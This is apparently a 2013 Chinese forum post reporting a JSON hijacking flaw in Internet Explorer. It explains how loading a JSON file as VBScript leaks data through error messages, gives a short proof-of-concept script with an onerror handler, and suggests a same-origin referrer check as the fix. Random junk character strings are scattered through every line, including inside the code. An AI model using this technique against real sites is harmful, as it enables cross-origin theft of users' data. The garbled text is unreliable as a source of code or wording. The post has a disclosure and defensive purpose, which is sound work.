简要描述:1 @$ M9 R, T! {1 g# T( l% K- C4 ]1 {
4 Y. F2 E/ s8 k. K* n4 d
由于某些资源容器对数据处理不当导致json劫持漏洞.) C4 `+ A0 Z# m
详细说明:, B3 v( J3 ` U
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
0 L t+ V3 M5 {: }& G: a<script language=vbscript></script>& R* v+ R! T, k' K- P6 X
{" J, V" a0 E% h: L) p当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
- c4 \! Q D( w2 ]2 \1 L漏洞证明:
9 H8 ~( I$ n) C; P% m<script>
+ s! {+ v' U: K3 @& \* }1 Nwindow.onerror=function(_){
7 `$ ^. q9 e% o" {# Valert(_), m' N A1 p! L5 U/ Q# ^* G
}
& j1 M. `) L; S8 L</script>) M7 _/ C) S2 ~5 {- r5 ]
<script language=vbscript src=1.json></script>2 U; |' j5 n0 Y1 ~
9 a7 Q' N/ s) F8 u7 f9 G4 `9 v
# j: u$ _+ v8 O/ J) H0 u2 }1.json:# d2 @! P- r4 m7 [2 l# k: ^
[{"name":"sogili","age":19}]1 P* @) u( b1 L: y+ U# M4 C7 {
修复方案:
# l/ |8 G+ j8 |网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对